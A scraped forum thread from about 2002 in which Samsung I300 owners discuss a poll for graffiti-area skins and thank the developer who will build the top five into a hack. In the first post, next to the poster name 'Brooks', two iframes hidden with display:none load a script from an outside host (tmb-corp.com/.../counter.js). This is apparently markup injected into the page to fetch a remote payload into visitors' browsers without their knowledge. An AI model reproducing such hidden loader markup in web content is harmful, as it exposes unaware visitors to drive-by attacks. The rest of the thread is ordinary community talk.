• 5 5.15%
  • 3 3.09%
  • 0 0%
  • 3 3.09%
  • 0 0%
+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

CONTEST: Graffiti Area Skins

here it is, the poll will end automatically 5 days from now.

Brooks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

We should be able to choose the Best 5 !!. Not only one. I love more than one!!!

Originally posted by yorch
    We should be able to choose the Best 5 !!. Not only one. I love more than one!!!
    I agree with yorch!!

Msik

Administrator

Arrow

i thought it was to be one pick.. if you guys dont want to participate then thats ok.. you can always do it yourself and sell it on palmgear.com...

by the way, the last one on the list is the one that comes with the phone... for free... so we all have it already...
    -[0_0]-

BTW - I think Brooks intended to put it there.
    4) The moderators will select the top 10 entries. (Based on whatever criteria they choose) Once the top ten entries are chosen, a poll will be posted for you the users to choose the winner
    Jake posted these rules a week ago and nobody has complained or disagreed thus far, so why start now. I think rule number 4 should have been adjusted, as I don't think the moderators should have had the luxury of choosing the top 10. Thanks to Brooks it has been.
    I like a few myself and would have liked to vote for more than 1, but to my knowledge, the polls only allow for 1 vote per user. I don't think there is anyway to adjust that.
    I am really disappointed here... this poll sucks
    This has been a lot of fun. We appreciate the efforts of the handful of contributors. Don't ruin it by bickering over what you alredy agreed upon.

Ok, I don't want to be the one that start another controversy here. Yes, I would've loved that I could choose more than one, but yes I understand that we can only check one, so later they decide the best ones. but hey would it be a shame, to let go some of the excellent designs of these people here! .

You know what would be a good idea?, take the first best skins and make them one hack, and another set to make another, maybe you can make a set for the Starwars, another for the Matrix, another for Star trek, another just different colors, etc...

That my friends I think is a good idea......of course it will take some work, but hey,....we are all here to help!

Thumbs up

In these days and times I'm a sucker for Old Glory!

One suggestion though: President's heads as buttoms, or landmarks like White House, Mt. Vernon, Montechello etc.

Great creativity in all though.

i did not understand the rules, I guess.

it will be really sad to see many of these never used...
    Last edited by digiBoy; 02-06-2002 at 01:19 PM.
    -[0_0]-

...so later they decide the best ones.
    This us v. them crap has to stop. JAKE SET THE RULES JAKE IS NOT A MODERATOR. The rules were posted a week ago. I agree with some of the valid points being raised. Yorch, after you decided to make it us v. them, you raised a very good idea. Send it to Jake, but don't insult him. Come on...

...this is really unfortunate.

What are you talking about???...I'm not insulting anyone!!..Chill out!.
    I just said that I understood the part of the rules, Like digiBoy said, I was a misunderstanding, but It it clear to me now.
    The Jake is going to do us all a HUGE FAVOR making this program, and sharing it with everyone. I don't try to bash him or anything like that, I think he is DA MAN!!.. I think this week of posting the skins is been great and a lot of fun, and Is been mouthwatering for most of us, but again, like Digiboy said, its it a little sad to let go to some skins that we might have preferences with.

This program is going to change the way that we look at our I300, (its going to make them look wayyyyyyy cooler than it is now).
    I just though at the beginning that maybe we could be able to choose our favorite ones, I we can, no problem, I already choose my one favorite, that's cool, I'm not going to be pest or anything like that to somebody that I'ts revolutionizing our beloved I300,a and changing the I300 for the better

AGAIN, I think THE JAKE is the man, and let's not start a controversy, for a misunderstanding.....for 3rd. time, I now understand the rules, they are clear to me. ok, over, I hope this clears up the controversy

We are all friends here, and a community...remember?

My fault then. I misunderstood your comment your comment about "them" choosing as sarcasm.

Oh and there's no controversy, just a discussion. They have their ups and downs, highs and lows my friend.

Originally posted by fejuada
    President's heads as buttoms
    Not to get political, but did you mean bottom or button? Either one may be appropriate....:p
    Cliff

THANKS!!!!

Just wanted to thank JAKE and all the contributors...whatever is selected, there will be at least one each of us will like, I am sure....very nice
    I love my wife and my I300...don't make me choose.

Originally posted by yorch
    That my friends I think is a good idea......of course it will take some work, but hey,....we are all here to help!
    That, my friend, is part of the problem. As much as we would all like to think we're "all here to help", the truth of the matter is that not a single person in our little universe - other than The Jake - has the requisite knowledge/skill set + coding tools to actually accomplish the job.

I'm a meager programmer - I would love to help if I could, but I recognize the fact that I cannot. Heck, even I've been guilty of posts along the lines of "Hey, it would be great if we could do this..." but in retrospect it seems as though I should have kept those thoughts to myself. Imagine if EVERYONE posted a request for their favorite "pet" application ... I'm afraid we'd scare The Jake and that he'd run screaming from the room, smash his cable modem to bits, and eat the pieces....

Maybe if Samsung ever releases a SDK the world will change, but until then we're all lucky to get whatever few spare moments of programming time that The Jake can toss out to us, amidst trying to make a living, have a life, chase girls (?), etc....

Good luck, Jake, and thanks for being such a pioneer! I know the thanks from the group are honest, even if we forget sometimes that there's little the rest of us mere mortals can do to help.

-Doug

PS: I know this issue has been mostly resolved, but just wanted to toss this point in here as well for consideration.

Give me a J!!!!!

too many to chose from ahhhh!

some cool stuff tho lot's of patriots here i guess

Guru
    Hey folks. Sorry that so many of these will go unused for the short term... but I haven't forsaken them all.

I'm going to compile a version with the top 5. (Any more and the hack file size gets too large)...

Then, in the future, if I have the time, I will work on a version that will let you install your own. (No promises). Its going to take some time. I don't really want to write a conduit... so the only way is to make something that uses pilrc to make a resource file that you'll install. We'll see.

Jake

Thumbs up

A big thanks to The Jake for doing this!! I can't see why anyone would complain in any way about him offering to do a favor for us all? I have to believe that once the Samsung SDK is released, programs/hacks like this will take off like gangbusters. No doubt at that time, we'll have a way to choose whatever image we want, and then we'll all be grateful The Jake got this little contest going to have some nice images all ready to go.

Just be patient! You'll be able to use anything soon enough. For now, let's see what the top five are!
    - Dan Butterfield (dan@butterfields.net)

Well said!